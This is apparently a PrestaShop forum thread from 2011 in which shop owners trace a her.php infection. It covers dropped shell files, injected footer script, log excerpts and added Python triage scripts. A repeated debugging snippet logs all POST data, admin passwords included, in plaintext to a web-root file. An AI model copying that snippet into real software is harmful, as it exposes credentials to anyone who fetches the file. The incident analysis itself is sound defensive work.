I run several bot-traps and firewall security on my server, because I've had a hacked server in the past with php-BB-forum software.

 

The security theme is a wide, complex theme, and it does not mean that if file xy was hacked, this file was the reason for the hack. In most cases some other open JS are the reason for intrusions AND no software is really secure...

You must make your server secure to not be hacked.


I can upload earlier logs if necessary - there is no other reference to her.php in my logs.

 

 

I found it on line 256:

127.0.0.1 - - [24/Aug/2011:09:44:13 +1000] "GET /ozhealth_local/modules/her.php HTTP/1.1" 200 -

 

 

Thanks for all these details.

 

 

Best regards,


Hi

 

One of my customers has the same problem.

I restored his site.

Right now I don't have server logs to look at to see when and how the her.php file was added.


This is my test finding.

 

Using SVN version_8151 to do a fresh installation (localhost)

 

Immediately after installation...access FO ---> no her.php file found

Then try access to BO by keying in password ---> her.php file was generated

No other files found in upload and download directory

Footer.tpl not altered

==continuing with further monitoring & testing

 

 

Please find attached access.log for your investigation.

access.txt


Hi,

I have 3 stores

 

1 has been infected

version 1.4.3

site was in maintenance mode

new php files in upload and download

smarty_v2 erased

footer.tpl altered

can't find her.php


Hello,

For those who can reproduce this bug on localhost, can you please redo an install and, before you take any action on your PrestaShop, add the following code:

	// Append every POST request and the server variables to log_her.txt in the shop root.
	// The dump holds every submitted form field in plain text.
	if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		if ($fd)
		{
			fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
			fclose($fd);
		}
	}

below the code

	function __construct()
	{

in file admin/tabs/adminModules.php. Once you have noticed the presence of the her.php infection, please send me by PM the log file her_log.txt in your PrestaShop root folder, thank you :D


I have the problem too on a 1.4.4 Prestashop.

Found it yesterday at about 6pm Paris time.

I removed my active theme directory by FTP, I uploaded a clean one, it worked again, but this morning it was infected again.


I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33


I'm curious: for those infected, what operating system do you use?

But as Raphael said, it's coming after the call of AdminModule.

We will keep you informed about any news.

 

Best regards


I got hacked too, website comes up with error 500.

 

I deleted the sus files as mentioned but I still get error 500.

 

How do I fix to get my client back online?

 

error log:

 

[24-Aug-2011 17:22:00] PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/thumpmus/public_html/tools/smarty_v2/Smarty.class.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/thumpmus/public_html/config/smarty.config.inc.php on line 33

 

Hi,

 

Try to re-upload your prestashop.

And check:

- /tools/smarty_v2/ exists

- /modules/her.php does NOT exist

 

Best regards,
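The symptoms reported in this thread (modules/her.php present, tools/smarty_v2 missing, PHP files other than index.php in upload and download, script code added to the theme's footer.tpl) can be checked in one pass. This is an added example, not code from the thread or from PrestaShop; the function names, the theme name `mytheme` and the sample tree are constructed for the demo, and the footer test (a script block using eval or fromCharCode) is an assumed heuristic.

```python
import re
import tempfile
from pathlib import Path

SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
OBFUSCATION = re.compile(r"\beval\b|fromCharCode")  # assumed heuristic, tune per site


def triage(shop_root, theme):
    """Return (indicator, relative_path) findings for one PrestaShop directory."""
    root = Path(shop_root)
    findings = []
    if (root / "modules" / "her.php").exists():
        findings.append(("dropper", "modules/her.php"))
    if not (root / "tools" / "smarty_v2").is_dir():
        findings.append(("missing-dir", "tools/smarty_v2"))
    # upload/ and download/ should hold no PHP file other than index.php.
    for name in ("upload", "download"):
        folder = root / name
        for f in sorted(folder.iterdir()) if folder.is_dir() else []:
            if f.suffix.lower() == ".php" and f.name != "index.php":
                findings.append(("unexpected-php", f"{name}/{f.name}"))
    # her.php rewrites footer.tpl by inserting code in front of </body>.
    footer = root / "themes" / theme / "footer.tpl"
    if footer.is_file():
        text = footer.read_text(errors="replace")
        if any(OBFUSCATION.search(body) for body in SCRIPT_BODY.findall(text)):
            findings.append(("footer-script", f"themes/{theme}/footer.tpl"))
    return findings


def build_sample(root, infected):
    """Constructed miniature shop tree for the demo; not data from a real shop."""
    root = Path(root)
    for d in ("modules", "upload", "download", "themes/mytheme", "tools/smarty_v2"):
        (root / d).mkdir(parents=True)
    for d in ("upload", "download"):
        (root / d / "index.php").write_text("<?php // placeholder\n")
    footer = "<div id=\"footer\"></div>\n</body>\n</html>\n"
    if infected:
        (root / "modules" / "her.php").write_text("<?php // stand-in\n")
        (root / "upload" / "0123abcd.php").write_text("<?php // stand-in\n")
        (root / "tools" / "smarty_v2").rmdir()
        footer = footer.replace(
            "</body>", "{literal}<script>e=eval;/* stand-in */</script>{/literal}</body>")
    (root / "themes" / "mytheme" / "footer.tpl").write_text(footer)


def demo():
    """Run the triage on a clean and an infected sample tree."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(Path(tmp) / "clean", infected=False)
        build_sample(Path(tmp) / "infected", infected=True)
        return (triage(Path(tmp) / "clean", "mytheme"),
                triage(Path(tmp) / "infected", "mytheme"))


if __name__ == "__main__":
    clean, infected = demo()
    print("clean:", clean)
    for indicator, path in infected:
        print(f"infected: {indicator:15} {path}")
```

A clean result only means none of these four symptoms is present; it does not show how the files got there.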


I'm curious: for those infected, what operating system do you use?

But as Raphael said, it's coming after the call of AdminModule.

We will keep you informed about any news.

 

Best regards

 

Hi Vincent, I am using a linux operating system if that helps.

 

Regards,

 

Mark.


I'm curious: for those infected, what operating system do you use?

 

I'm working on OSX 10.5.8

and for hosting this is Linux Apache/2.2.14 (Unix) PHP: 5.2.5 MySQL: 5.1.44

 

 

Thanks


Hello,

For those who can reproduce this bug on localhost, can you please redo an install and, before you take any action on your PrestaShop, add the following code:

	// Append every POST request and the server variables to log_her.txt in the shop root.
	// The dump holds every submitted form field in plain text.
	if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		if ($fd)
		{
			fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
			fclose($fd);
		}
	}

below the code

	function __construct()
	{

in file admin/tabs/adminModules.php. Once you have noticed the presence of the her.php infection, please send me by PM the log file her_log.txt in your PrestaShop root folder, thank you :D


Also infected on at least two sites (1.4.4.0), but apparently not all my PS sites. But I have to ftp access at the office... One of the infected sites has absolutely no additional modules (it's a test site).

 

Hosted on a Linux Debian OS. Websites uploaded from my Windows 7 (with MS Essential Security) and Filezilla.


For those who can reproduce this bug on localhost, if you can provide us with SSH access to your server BEFORE just after a new install, this would be a great help. You can send it to me by PM.

 

Regards


Windows 7 OS.

Prestashop 1.4.4

 

My site was fine at 6:00pm 8/23 then at 7:58 pm 5/23 I noticed my site isn't functioning properly.

 

I sent a ticket to my host and this was found.

 

Removed:

/home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/dd58e9270114ad1f95c0e3da514a2b6c.php: PHP.Hide.UNOFFICIAL FOUND

/home/sfbm/public_html/videos/wp-content/themes/zzz/scripts/cache/7e30804b68501ac775c35e1db21b502f.php: PHP.Hide.UNOFFICIAL FOUND

/home/sfbm/public_html/webstore/download/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND

/home/sfbm/public_html/webstore/upload/647226b6ef10264fb0c2c5336a924ef7.php: Atomicorp.honeypot.hex.php.cmdshell.unclassed.338.UNOFFICIAL FOUND

 

The attacker was able to access my account by using your store's admin interface.

 

/usr/local/apache/domlogs/sfbm/-----.com: IP ADDRESS - - [23/Aug/2011:19:18:12 -0500] "POST /webstore/admin/ajax.php HTTP/1.1" 200 20 "http://-----.com/webstore/admin/index.php?tab=AdminTools&token=a14d47e372b19cd728aace" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/IP ADDRESS Safari/ADDRESS"

 

 

Now my whole ajax categories and cart is messed up. Site doesn't function the same anymore.

 

505tfl.jpg

 

Detected when I was browsing my store.

 

UPDATE: 8/24 3:32 AM

 

dzoqv.jpg


Guys

 

I'm one of the people who have been hacked.

Here is what I found:

 

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /cms.php?id_cms=1 HTTP/1.1" 503 1220 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /themes/xx/css/maintenance.css HTTP/1.1" 200 623 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/admin/tab-tools.gif HTTP/1.1" 200 351 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:44 -0400] "GET /img/logo.jpg HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:45 -0400] "GET /img/favicon.ico HTTP/1.1" 200 1148 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

92.200.123.234 - - [24/Aug/2011:05:28:51 -0400] "GET /product.php?id_product=xx HTTP/1.1" 503 1189 "-" "Mozilla/5.0 (000000000; 00000 000 00 0 000000) DDDDDDDDDDDDDDDDDD DDDDDDD DDDD DDDDDD DDDDDDDDDDD DDDDDDDDDDDDD"

 

I looked up the IP address and found this:

 



Local host site on wamp connects to erabaglanti.ka.hn

& the little square at the bottom is an iframe

 

Hi,

 

Me too !!

 

PS 1.4.1.0


Just checked my sites & my clients' sites & it seems to be only 1.4.3 & 1.4.4 affected so far. One site is in maintenance mode & was still affected.

I'm now going to try a clean install on wamp & see what the logs say after.

Hi

 

Infected as well, had to put the shop offline

I'm on 1.4.2.5

 

can we have a progress report from the presta team?

 

regards Pieter


Hello,

For those who can reproduce this bug on localhost, can you please redo an install and, before you take any action on your PrestaShop, add the following code:

	// Append every POST request and the server variables to log_her.txt in the shop root.
	// The dump holds every submitted form field in plain text.
	if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		if ($fd)
		{
			fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
			fclose($fd);
		}
	}

below the code

	function __construct()
	{

in file admin/tabs/adminModules.php. Once you have noticed the presence of the her.php infection, please send me by PM the log file her_log.txt in your PrestaShop root folder, thank you :D

 

Can you please read the quote? If someone can do all this, it would be a great help to us.


Hi, our website was also hacked. Now I have had to stop access to the website; can anybody give a clear solution?


For anyone who finds a her.php file under their modules directory, you should do the following:

- Check the file creation time, write this down and delete the file from your server.

- Go to your Apache raw access logs. You should be able to access them using your hosting control panel.

- Find the line that corresponds to the file creation time you wrote down earlier.

- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.

This data would help identify the root of the problem.

 

To see if you have been attacked, check the following:

- Is there any php file under your uploads or downloads directory apart from index.php?

- Is there a strange javascript at the end of your footer.tpl file?

 

If any of the above happens, change your mysql username and password.

 

 

I could not find the her.php file, but my footer.tpl surely had the strange javascript at the bottom. With some weird file in upload and download directories.

Site is still up though, but the add to cart buttons didn't work properly and I got a security cert warning from SSL pages showing a weird SSL certificate which was not mine.

All slideshows have stopped working. Cannot order products because add to cart does not work anymore.
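The log step in the quoted instructions (take the her.php timestamp, then pull the access-log lines from 5 minutes before to 5 minutes after) is shown here as an added example, not code from the thread or from PrestaShop. Times are compared in UTC because each log line carries its own offset; the function names, the use of mtime as the "creation time", and the sample log are assumptions constructed for the demo.

```python
import os
import re
from datetime import datetime, timedelta, timezone

LOG_TIME = re.compile(r"\[(\d{2}/[A-Za-z]{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")
REQUEST = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+"')
DROPPED_PHP = re.compile(r"/(?:upload|download)/(?!index\.php)[^/?]+\.php")


def file_time_utc(path):
    """Modification time of a file as an aware UTC datetime.
    Assumption: mtime stands in for the 'creation time' the instructions ask for."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)


def log_time(line):
    """Timestamp of an Apache access-log line, with its UTC offset kept."""
    m = LOG_TIME.search(line)
    return datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z") if m else None


def label(line):
    """Mark the request types this thread singles out."""
    m = REQUEST.search(line)
    if not m:
        return "unparsed"
    method, path = m.groups()
    if path.split("?")[0].endswith("/modules/her.php"):
        return "her.php"
    if DROPPED_PHP.search(path):
        return "upload/download php"
    return "POST" if method == "POST" else "-"


def window(lines, event_time, minutes=5):
    """Lines logged within +/- `minutes` of event_time, as (label, line) pairs."""
    span = timedelta(minutes=minutes)
    hits = []
    for line in lines:
        ts = log_time(line)
        if ts is not None and abs(ts - event_time) <= span:
            hits.append((label(line), line))
    return hits


# Constructed sample log (documentation addresses, not lines from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Aug/2011:11:10:02 +0100] "GET /cms.php?id_cms=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2011:11:22:30 +0100] "POST /admin/ajax.php HTTP/1.1" 200 20',
    '198.51.100.7 - - [24/Aug/2011:11:25:56 +0100] "GET /modules/her.php HTTP/1.1" 200 -',
    '203.0.113.9 - - [24/Aug/2011:11:27:10 +0100] "GET /upload/0123abcd.php HTTP/1.1" 200 312',
    '203.0.113.9 - - [24/Aug/2011:11:40:00 +0100] "GET /product.php?id_product=1 HTTP/1.1" 200 900',
]
# her.php timestamp as read on the server, expressed in UTC (11:25:56 +0100).
SAMPLE_EVENT = datetime(2011, 8, 24, 10, 25, 56, tzinfo=timezone.utc)

if __name__ == "__main__":
    for tag, line in window(SAMPLE_LOG, SAMPLE_EVENT):
        print(f"{tag:20} {line}")
```

Reading the file time as local time without its offset shifts the window by the offset, which with this sample returns no lines at all.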


Same php files in /download and /upload folder. Footer.tpl in theme folder changed.

her.php in module folder does not exist.

Prestashop 1.4.3


I also got infected by js.Rediretor-IY Tjn yesterday. I'm running 1.4.4 shop but did not find the her.php file. I ran my page source and found this at the bottom....

 

My footer.tpl had the code in it. Also, I had the strange files in upload and download, which I've deleted, and renamed the directories. I'm hoping that works. Is there any way to stop this from happening again?


Hello,

For those who can reproduce this bug on localhost, can you please redo an install and, before you take any action on your PrestaShop, add the following code:

	// Append every POST request and the server variables to log_her.txt in the shop root.
	// The dump holds every submitted form field in plain text.
	if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		if ($fd)
		{
			fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
			fclose($fd);
		}
	}

below the code

	function __construct()
	{

in file admin/tabs/adminModules.php. Once you have noticed the presence of the her.php infection, please send me by PM the log file her_log.txt in your PrestaShop root folder, thank you :D

 

Reading all posts here, it seems the upload / download files and code in footer.tpl are being added when a password is keyed into the admin login on screen.

I have an uninfected shop, footer.tpl is as it should be and upload / download only have index.php.

Using this shop, I added the code above to the file and uploaded it. Logged out of admin, checked upload / download and footer.tpl, all clean.

Relogged in typing the password. WHOA! upload / download have new files, footer.tpl has extra code but no sign of her.php in modules and no log_her.txt in root!

This her.php is being created at a different time than everything else.

I will search through the log files and post anything with her.php

 

Hope this helps.

 

Neller


Just in case, I added some "protection" to my site. My site was not affected - but you never know.

I changed the footer.tpl file permissions to 444

Also I created a her.php file in the /modules folder with permissions 400

If an attacker can still rewrite these files - then we have some problems with the web server


I mentioned that I had the same code in footer.tpl as in post #84.

 

download and upload folder renamed

footer.tpl set permissions to 444.


The only entry for her.php in logs was (url removed);

blah-blah.com my.ip.add.ress - - [24/Aug/2011:11:25:56 +0100] "GET /modules/her.php HTTP/1.1" 200 - "http://blahblah.com/admin/" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"


One of my stores (1.4.3) got hacked too, funny that the only request to her.php was from my ip address.
